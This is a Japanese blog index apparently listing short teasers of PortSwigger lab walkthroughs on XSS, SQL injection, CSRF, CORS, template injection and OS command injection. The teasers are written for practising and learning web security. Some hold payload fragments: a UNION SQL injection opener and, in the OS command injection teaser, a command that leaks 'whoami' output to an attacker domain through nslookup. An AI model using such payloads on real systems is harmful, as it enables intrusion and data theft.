Shikata Ga Nai

Private? There is no such things.

PortSwigger

Reflected XSS with AngularJS sandbox escape without stringsをやってみた

Hello there, ('ω')ノ 文字列なしのAngularJSサンドボックスエスケープを使用したリフレクトXSSを。このラボでは、 AngularJS を通常とは異なる方法で使用していて。 $eval 関数は使用できず、AngularJSで文字列は使用できないらしく。 ラボを解決するにクロ…

Blind SQL injection with out-of-band data exfiltrationをやってみた

Hello there, ('ω')ノ 帯域外データ抽出を使用したブラインドSQLインジェクションを。 このラボには、SQLインジェクションの脆弱性があって。 トラッキングCookieを使用して。SQLクエリを実行して。 SQLクエリは非同期で実行されて、アプリケーションの応答…

Blind SQL injection with out-of-band interactionをやってみた

Hello there, ('ω')ノ 帯域外の相互作用を伴うブラインドSQLインジェクションを。 このラボには、 ブラインドSQLインジェクションに脆弱性があって。 TrackingId Cookieを使用し、送信されたCookieの値を含むSQLクエリを実行して。 SQLクエリは非同期で実行…

SQL injection attack, querying the database type and version on MySQL and Microsoftをやってみた

Hello there, ('ω')ノ MySQLとMicrosoftのデータベースタイプとバージョンのクエリを。 このラボには、SQLインジェクションの脆弱性があって。 UNION攻撃を使用して、挿入されたクエリから結果を取得できるらしく。 まずは、ページにアクセスして。 まずは、…

SQL injection attack, listing the database contents on Oracleをやってみた

Hello there, ('ω')ノ SQLインジェクション攻撃、Oracle上のデータベースコンテンツの一覧表示を。 UNION攻撃を使用して他のテーブルからデータを取得できるとのことで。 まずは、ページにアクセスして。 下記のペイロードからカラム数を確定して。 '+UNION+…

SQL injection attack, querying the database type and version on Oracleをやってみた

Hello there, ('ω')ノ SQLインジェクション攻撃、Oracleのデータベースタイプとバージョンのクエリを。 このラボには、SQLインジェクションの脆弱性があって。 UNION攻撃で、クエリから結果を取得できるらしく。 まずは、ページにアクセスして。 リクエスト…

Clickjacking with a frame buster scriptをやってみた

Hello there, ('ω')ノ フレームバスタースクリプトを使用したクリックジャッキングを。 このラボは、Webサイトがフレーム化されるのを防ぐ。 フレームバスターによって保護されていて。 フレームバスターを回避するクリックジャッキング攻撃でメールアドレス…

Basic password reset poisoningをやってみた

Hello there, ('ω')ノ 基本的なパスワードリセットポイゾニングを。 このラボは、パスワードリセットポイズニングに対して脆弱で。 まずは、Forgetをクリックして。 wienerのパスワードリセットをリクエストして。 エクスプロイトサーバで、Emailをクリック…

Basic server-side template injection (code context)をやってみた

Hello there, ('ω')ノ 基本的なサーバサイドのテンプレートインジェクション(コードコンテキスト)を。 このラボは 、Tornadoテンプレートを安全に使用していないので脆弱のようで。 まずは、ログインから。 コメントを投稿して、結果を確認して。 どうやら…

Basic server-side template injectionをやってみた

Hello there, ('ω')ノ 基本的なサーバサイドのテンプレートインジェクションを。 このラボは、サーバサイドのテンプレートインジェクションに脆弱で。 ERBテンプレートの構築が安全でないのが原因で。 まずは、製品の詳細を表示しようとすると。 GET リクエ…

CSRF where Referer validation depends on header being presentをやってみた

Hello there, ('ω')ノ リファラーの検証が存在するヘッダーに依存するCSRFを。 このラボのメール変更機能はCSRFに対して脆弱で。 クロスドメインリクエストをブロックしようとするものの。 安全でないフォールバックがあって。 ラボを解決するには、CSRF攻撃…

CSRF where token is tied to non-session cookieをやってみた

Hello there, ('ω')ノ トークンが非セッションCookieに関連付けられているCSRFを。 このラボのメール変更機能はCSRFに対して脆弱で。 トークンはサイトのセッション処理システムに完全には統合されていなとのこと。 CSRF攻撃で、電子メールアドレスを変更せ…

CSRF where token is duplicated in cookieをやってみた

Hello there, ('ω')ノ トークンがCookieに複製されるCSRFを。 このラボのメール変更機能はCSRFに対して脆弱で。 エクスプロイトサーバでCSRF攻撃をして電子メールアドレスを変更せよと。 まずは、動作確認を。 リクエストボディにcsrfは見当たらず。 ログイ…

Reflected XSS into HTML context with all tags blocked except custom onesをやってみた

Hello there, ('ω')ノ カスタムタグを除くタグがブロックされた状態でXSSをHTMLコンテキストに反映を。 このラボでは、カスタムタグを除くすべてのHTMLタグをブロックして。 ラボを解決するにはカスタムタグを挿入してXSS攻撃を実行せよとのことで。 まずは…

Exploiting XSS to perform CSRFをやってみた

Hello there, ('ω')ノ XSSを活用してCSRFを実行を。 このラボではブログのコメント機能に脆弱性があって。 脆弱性を悪用してCSRF攻撃 で、ブログ投稿のコメントを表示する人の。 電子メールアドレスを変更せよと。 まずは、ログインして。 アカウントページ…

Exploiting cross-site scripting to capture passwordsをやってみた

Hello there, ('ω')ノ クロスサイトスクリプティングを活用してパスワードを取得を。 このラボでは、ブログのコメント機能に脆弱性があって。 この脆弱性を悪用して被害者のユーザ名とパスワードを盗んで。 被害者のアカウントにログインするとのことで。 ま…

Exploiting cross-site scripting to steal cookiesをやってみた

Hello there, ('ω')ノ クロスサイトスクリプティングを利用してCookieを盗むを。 このラボは、ブログのコメント機能に脆弱性があって。 被害者は、すべてのコメントを表示する際に脆弱性が悪用されて。 被害者のセッションCookieを盗み出して、それを使用し…

Reflected XSS protected by CSP, with CSP bypassをやってみた

Hello there, ('ω')ノ CSPバイパスを使用してCSPで保護された反射型XSSを。 このラボでは、CSPを使用しているとのことで。 コンテンツセキュリティポリシー (CSP) は。 クロスサイトスクリプティング (XSS) などの攻撃を検知して。 影響を軽減するために追加…

Reflected XSS in a JavaScript URL with some characters blockedをやってみた

Hello there, ('ω')ノ 一部の文字がブロックされたJavaScriptURLに反映されたXSSを。 このラボでは、入力内容をJavaScript URLに反映していて。 ただ、アプリケーションはXSS攻撃を防ぐために一部の文字をブロックしていると。 ラボを解決するには、アラート…

Reflected XSS in canonical link tagをやってみた

Hello there, ('ω')ノ 正規リンクタグに反映されたXSSを。 このラボは、ユーザ入力を正規リンクタグに反映して山括弧をエスケープするらしく。 ラボを解決するには、XSS攻撃を呼び出す必要があって。 XSSを呼び出すために下記のキーを押すとのことで。 ただ…

CORS vulnerability with trusted insecure protocolsをやってみた

Hello there, ('ω')ノ 信頼できる安全でないプロトコルによるCORSの脆弱性を。 サイトには、プロトコルに関係なくすべてのサブドメインを信頼するという点で。 安全でないCORS構成があるようで。 まずは、ログインしてアカウントページにアクセスして。 履歴…

CORS vulnerability with trusted null originをやってみた

Hello there, ('ω')ノ 信頼できるヌルオリジンによるCORSの脆弱性を。 「null」オリジンを信頼するという点で安全でないCORS構成があって。 まずは、ログインして、マイアカウントをクリックして。 該当するリクエストは、/accountDetailsへのAJAXリクエスト…

CORS vulnerability with basic origin reflectionをやってみた

Hello there, ('ω')ノ 基本的なオリジンリフレクションを伴うCORSの脆弱性を。 Origin リクエストヘッダは、どこがフェッチの原点であるかを示して。 パス情報は含まれず、サーバ名のみが含まれて。 Referer ヘッダとは、パス全体が公開されるわけではない点…

DOM-based cookie manipulationをやってみた

Hello there, ('ω')ノ DOMベースのCookie操作を。 このラボでは、DOMベースのクライアント側のCookie操作について説明して。 ラボを解決するには、別のページにXSSを発生させるCookieを挿入して。 まずは、Last viewed productメニューを表示させてクリック…

DOM XSS using web messages and a JavaScript URLをやってみた

Hello there, ('ω')ノ WebメッセージとJavaScriptURLを使用したDOMXSSを。 このラボでは、Webメッセージングでトリガーされる。 DOMベースのリダイレクトの脆弱性があって。 まずは、サイトにアクセスしてみると。 下記のようなJavascriptが確認できて。 ど…

DOM XSS using web messagesをやってみた

Hello there, ('ω')ノ Webメッセージを使用するDOMXSSを。 WebメッセージをリッスンするaddEventListenerが確認できて。 「addEventListener()」は、JavaScriptからさまざまなイベント処理を実行できて。 まずは、下記にアクセスして。 https://aca01f2c1ee4…

Blind OS command injection with out-of-band data exfiltrationをやってみた

Hello there, ('ω')ノ 帯域外チャネルは、挿入されたコマンドから出力を抽出する簡単な方法を提供して。 whoamiで、コマンドの結果を含む攻撃者のドメインでDNS lookupが発生して。 例えば、下記のように。 & nslookup `whoami`.kgji2ohoyw.web-attacker.com…

Blind OS command injection with out-of-band interactionをやってみた

Hello there, ('ω')ノ 帯域外の相互作用を伴うブラインドOSコマンドインジェクションを。 文字列はコマンドセパレータとして機能して。 コマンドをチェーン化できて。 下記のコマンドセパレータは、WindowsとUnixベースの両方で機能して。 &&&||| まずは、下…

Host header authentication bypassをやってみた

Hello there, ('ω')ノ リクエストが送信されるサーバのHostヘッダ認証バイパスを。 リクエストをリピータへ。 Hostヘッダを変更してSendしても、正常にレスポンスが返ってきて。 robots.txtのレスポンスは以下のとおりで。 https://acdb1f811fffc1ad80e26504…

URL normalizationをやってみた

Hello there, ('ω')ノ ブラウザのURLエンコードが原因で直接悪用できないXSSの脆弱性が含まれていて。 ラボを解決するには、キャッシュの正規化プロセスを利用するとのことで。 まずは、サイトにアクセスして。 正常にキャッシュできていないようで。 X-Cach…